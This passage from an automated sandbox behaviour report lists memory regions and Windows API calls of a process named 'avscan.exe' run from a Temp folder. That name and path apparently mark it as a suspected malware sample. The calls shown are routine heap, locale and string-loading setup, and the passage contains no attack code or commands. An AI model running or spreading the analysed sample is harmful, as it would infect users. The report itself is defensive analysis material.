"c:\\windows\\syswow64\\shfolder.dll") Region: id = 1634 start_va = 0xdf0000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1635 start_va = 0xef0000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 1636 start_va = 0x3580000 end_va = 0x37e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 1637 start_va = 0xf70000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 1638 start_va = 0x1070000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1639 start_va = 0x7ebd0000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ebd0000" filename = "" Region: id = 1640 start_va = 0x2ad0000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 1641 start_va = 0x2c70000 end_va = 0x2caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 1642 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1643 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1644 start_va = 0x744d0000 end_va = 0x7454ffff monitored = 0 entry_point = 0x744e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1645 start_va = 0x37f0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 1646 start_va = 0x3390000 end_va = 0x346efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003390000" filename = "" Region: id = 1647 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1648 start_va = 0x340000 end_va = 0x340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1649 start_va = 0x3580000 end_va = 0x3737fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 1650 start_va = 0x3760000 end_va = 0x37e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 1651 start_va = 0x350000 end_va = 0x350fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1652 start_va = 0x74670000 end_va = 0x7467afff monitored = 0 entry_point = 0x74671992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1653 start_va = 0x360000 end_va = 0x360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1654 start_va = 0x370000 end_va = 0x376fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1655 start_va = 0x360000 end_va = 0x360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1656 start_va = 0x370000 end_va = 0x376fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1657 start_va = 0x360000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1658 start_va = 0x39f0000 end_va = 0x3beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039f0000" filename = "" Region: id = 1659 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1660 start_va = 0x3a0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1661 start_va = 0x3bf0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bf0000" filename = "" Region: id = 1662 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1663 start_va = 0x3df0000 end_va = 0x3fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 1664 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1665 start_va = 0x72ec0000 end_va = 0x72f1efff monitored = 0 entry_point = 0x72ec2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1666 start_va = 0x74490000 end_va = 0x744a2fff monitored = 0 entry_point = 0x74491d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1667 start_va = 0x3f0000 end_va = 0x3f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1668 start_va = 0x1270000 end_va = 0x12effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1669 start_va = 0x1340000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1670 start_va = 0x12f0000 end_va = 0x12f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012f0000" filename = "" Region: id = 1671 start_va = 0x77450000 end_va = 0x774d2fff monitored = 0 entry_point = 0x774523d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1672 start_va = 0x1300000 end_va = 0x1300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001300000" filename = "" Region: id = 1673 start_va = 0x75390000 end_va = 0x753b9fff monitored = 0 entry_point = 0x753913f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1674 start_va = 0x1310000 end_va = 0x1324fff monitored = 0 entry_point = 0x13113f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Thread: id = 69 os_tid = 0xba4 [0148.365] GetVersion () returned 0x1db10106 [0148.365] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0148.365] GetProcAddress (hModule=0x75a80000, lpProcName="IsTNT") returned 0x0 [0148.366] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2cb0000 [0148.366] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x2cc0000 [0148.367] VirtualAlloc (lpAddress=0x2cc0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x2cc0000 [0148.369] GetCurrentThreadId () returned 0xba4 [0148.369] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0148.369] GetEnvironmentStringsW () returned 0x10858a0* [0148.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1473, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1473 [0148.370] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x5d0) returned 0x2cb07d0 [0148.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1473, lpMultiByteStr=0x2cb07d0, cbMultiByte=1473, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1473 [0148.370] FreeEnvironmentStringsW (penv=0x10858a0) returned 1 [0148.370] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x480) returned 0x2cb0da8 [0148.370] GetStartupInfoA (in: lpStartupInfo=0x28f9b8 | out: lpStartupInfo=0x28f9b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0148.370] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0148.370] GetFileType (hFile=0x0) returned 0x0 [0148.370] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0148.370] GetFileType (hFile=0x0) returned 0x0 [0148.370] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0148.370] GetFileType (hFile=0x0) returned 0x0 [0148.370] SetHandleCount (uNumber=0x20) returned 0x20 [0148.371] GetACP () returned 0x4e4 [0148.371] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f9e0 | out: lpCPInfo=0x28f9e0) returned 1 [0148.371] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0148.374] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb07d0 | out: hHeap=0x2cb0000) returned 1 [0148.374] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75a80000 [0148.374] GetProcAddress (hModule=0x75a80000, lpProcName="IsProcessorFeaturePresent") returned 0x75a951ed [0148.374] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0148.374] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x800) returned 0x2cb1230 [0148.375] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0148.375] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x9c [0148.376] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0148.376] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0148.376] GetVersion () returned 0x1db10106 [0148.376] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0148.383] GetUserDefaultLCID () returned 0x409 [0148.383] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0148.383] GetSystemMetrics (nIndex=5) returned 1 [0148.384] GetSystemMetrics (nIndex=6) returned 1 [0148.384] GetSystemMetrics (nIndex=11) returned 32 [0148.384] GetSystemMetrics (nIndex=12) returned 32 [0148.384] GetSystemMetrics (nIndex=34) returned 132 [0148.384] GetSystemMetrics (nIndex=35) returned 38 [0148.384] GetSystemMetrics (nIndex=0) returned 1440 [0148.384] GetSystemMetrics (nIndex=1) returned 900 [0148.384] GetSystemMetrics (nIndex=32) returned 8 [0148.384] GetSystemMetrics (nIndex=33) returned 8 [0148.384] GetSystemMetrics (nIndex=42) returned 0 [0148.384] GetStockObject (i=15) returned 0x188000b [0148.384] GetStockObject (i=7) returned 0x1b00017 [0148.384] GetStockObject (i=6) returned 0x1b00018 [0148.384] GetStockObject (i=8) returned 0x1b00016 [0148.384] GetStockObject (i=4) returned 0x1900011 [0148.384] GetStockObject (i=2) returned 0x1900012 [0148.384] GetStockObject (i=0) returned 0x1900010 [0148.384] GetStockObject (i=5) returned 0x1900015 [0148.384] GetStockObject (i=13) returned 0x18a002e [0148.384] GetDC (hWnd=0x0) returned 0xc010b3c [0148.385] GetTextExtentPointA (in: hdc=0xc010b3c, lpString="0", c=1, lpsz=0x28f9dc | out: lpsz=0x28f9dc) returned 1 [0148.387] GetDeviceCaps (hdc=0xc010b3c, index=14) returned 1 [0148.388] GetDeviceCaps (hdc=0xc010b3c, index=12) returned 32 [0148.388] GetDeviceCaps (hdc=0xc010b3c, index=88) returned 96 [0148.388] GetDeviceCaps (hdc=0xc010b3c, index=90) returned 96 [0148.388] GetDeviceCaps (hdc=0xc010b3c, index=38) returned 32409 [0148.388] ReleaseDC (hWnd=0x0, hDC=0xc010b3c) returned 1 [0148.388] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0x2c70000 [0148.390] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x76da66bc) returned 0x0 [0148.390] GetCurrentThreadId () returned 0xba4 [0149.249] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0149.249] GetStartupInfoA (in: lpStartupInfo=0x28fe8c | out: lpStartupInfo=0x28fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0149.249] GetVersion () returned 0x1db10106 [0149.249] GetVersion () returned 0x1db10106 [0149.249] GetCurrentThreadId () returned 0xba4 [0149.260] GetModuleFileNameA (in: hModule=0x42d000, lpFilename=0x28f988, nSize=0x105 | out: lpFilename="." (normalized: "c:\\users\\keecfmwgj\\desktop\\.")) returned 0x0 [0149.260] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f863, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0149.260] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0149.260] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0149.337] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0149.366] lstrcpynA (in: lpString1=0x28f863, lpString2=".", iMaxLength=261 | out: lpString1=".") returned="." [0149.366] GetThreadLocale () returned 0x409 [0149.366] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x28f973, cchData=5 | out: lpLCData="ENU") returned 4 [0149.366] lstrlenA (lpString=".") returned 1 [0149.366] LoadStringA (in: hInstance=0x42d000, uID=0xffd6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid NULL variant operation") returned 0x1e [0149.367] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1087708 [0149.367] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0xdf0000 [0149.368] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1088708 [0149.368] VirtualAlloc (lpAddress=0xdf0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xdf0000 [0149.368] LoadStringA (in: hInstance=0x42d000, uID=0xffd5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0149.368] LoadStringA (in: hInstance=0x42d000, uID=0xffd3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array is locked") returned 0x1f [0149.368] LoadStringA (in: hInstance=0x42d000, uID=0xffd4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffef, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read") returned 0x4 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffd2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffee, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffeb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Application Error") returned 0x11 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffd1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffd0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Write") returned 0x5 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffe4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffe5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation at address %p. %s of address %p") returned 0x30 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffe6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffe3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffe1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xffff, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xfffe, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xfffd, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xfffc, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xfffb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xfffa, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0149.369] LoadStringA (in: hInstance=0x42d000, uID=0xfff9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0149.370] LoadStringA (in: hInstance=0x42d000, uID=0xfff8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0149.370] LoadStringA (in: hInstance=0x42d000, uID=0xfff7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0149.370] LoadStringA (in: hInstance=0x42d000, uID=0xfff6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0149.370] LoadStringA (in: hInstance=0x42d000, uID=0xfff5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0149.370] LoadStringA (in: hInstance=0x42d000, uID=0xfff4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="I/O error %d") returned 0xc [0149.370] LoadStringA (in: hInstance=0x42d000, uID=0xfff3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0149.370] LoadStringA (in: hInstance=0x42d000, uID=0xfff2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid argument to date encode") returned 0x1f [0149.380] LoadStringA (in: hInstance=0x42d000, uID=0xfff0, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="'%s' is not a valid integer value") returned 0x21 [0149.381] LoadStringA (in: hInstance=0x42d000, uID=0xffe0, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0149.381] GetVersionExA (in: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x77a90362, dwMinorVersion=0x77a8e192, dwBuildNumber=0x3, dwPlatformId=0x764e0381, szCSDVersion="\x13") | out: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0149.381] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0149.381] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceExA") returned 0x75b148ef [0149.381] GetThreadLocale () returned 0x409 [0149.392] GetThreadLocale () returned 0x409 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jan") returned 4 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x28fd08, cchData=256 | out: lpLCData="January") returned 8 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Feb") returned 4 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x28fd08, cchData=256 | out: lpLCData="February") returned 9 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mar") returned 4 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="March") returned 6 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Apr") returned 4 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="April") returned 6 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jun") returned 4 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="June") returned 5 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jul") returned 4 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="July") returned 5 [0149.392] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Aug") returned 4 [0149.393] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="August") returned 7 [0149.394] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sep") returned 4 [0149.394] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x28fd08, cchData=256 | out: lpLCData="September") returned 10 [0149.394] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Oct") returned 4 [0149.394] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x28fd08, cchData=256 | out: lpLCData="October") returned 8 [0149.394] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Nov") returned 4 [0149.394] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x28fd08, cchData=256 | out: lpLCData="November") returned 9 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Dec") returned 4 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x28fd08, cchData=256 | out: lpLCData="December") returned 9 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sun") returned 4 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sunday") returned 7 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mon") returned 4 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Monday") returned 7 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tue") returned 4 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tuesday") returned 8 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wed") returned 4 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wednesday") returned 10 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thu") returned 4 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thursday") returned 9 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Fri") returned 4 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Friday") returned 7 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sat") returned 4 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Saturday") returned 9 [0149.395] GetThreadLocale () returned 0x409 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x28fd64, cchData=256 | out: lpLCData="$") returned 2 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=".") returned 2 [0149.395] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x28fd64, cchData=256 | out: lpLCData="2") returned 2 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x28fe5c, cchData=2 | out: lpLCData="/") returned 2 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x28fd64, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0149.396] GetThreadLocale () returned 0x409 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0149.396] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x28fd64, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") 